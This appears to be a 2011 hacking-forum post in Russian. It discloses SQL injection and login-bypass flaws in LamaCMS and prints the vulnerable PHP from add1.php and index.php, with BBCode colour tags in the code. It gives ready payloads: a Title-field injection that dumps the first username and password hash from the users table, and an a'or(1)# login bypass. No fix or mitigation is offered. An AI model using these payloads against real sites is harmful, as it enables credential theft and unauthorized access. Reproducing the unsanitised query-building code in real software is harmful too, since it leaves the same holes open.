07.05.2011, 22:01
|
|
Новичок
Регистрация: 04.05.2011
Сообщений: 10
Провел на форуме:
3598
Репутация:
10
|
|
LamaCMS SQLi
Need: магия off, аккаунт юзера
./modules/pages/add1.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]'Add Page'[/COLOR][COLOR="#007700"];
if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]) && !empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'textfield'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$author[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO pages (title,content,author) VALUES ('[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$author[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]'Your page has been added.'[/COLOR][COLOR="#007700"];
}
else
{
echo[/COLOR][COLOR="#DD0000"]'Not all fields are filled in correctly. Try again.'[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
Example:
Код:
http://localhost/lamacms/index1.php?inav=pages&modapp=add
Title: ololo', (select concat_ws(0x3a,username,password)as krasnoenebo from users limit 0,1), 'redsky')-- -
Либо напрямую шлем пост-запрос.
Идем смотреть пагу, в контенте будет вывод.
Authorization bypass
Need: магия в оффе
./index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]switch (@[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#FF8000"]//Case1: login form submitted
[/COLOR][COLOR="#007700"]case[/COLOR][COLOR="#DD0000"]"login"[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM users WHERE username='[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#DD0000"]' AND password = md5('[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
while ([/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$membertype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'membertype'[/COLOR][COLOR="#007700"]];
}
[/COLOR][/COLOR]
Example:
Код:
login: a'or(1)#
password: =(
Также при добавлении и редактировании чего-либо имеются скули, но смысла в их выкладывании не вижу, т.к. имеются теже зависимости, что и в предыдущих багах. |
|
|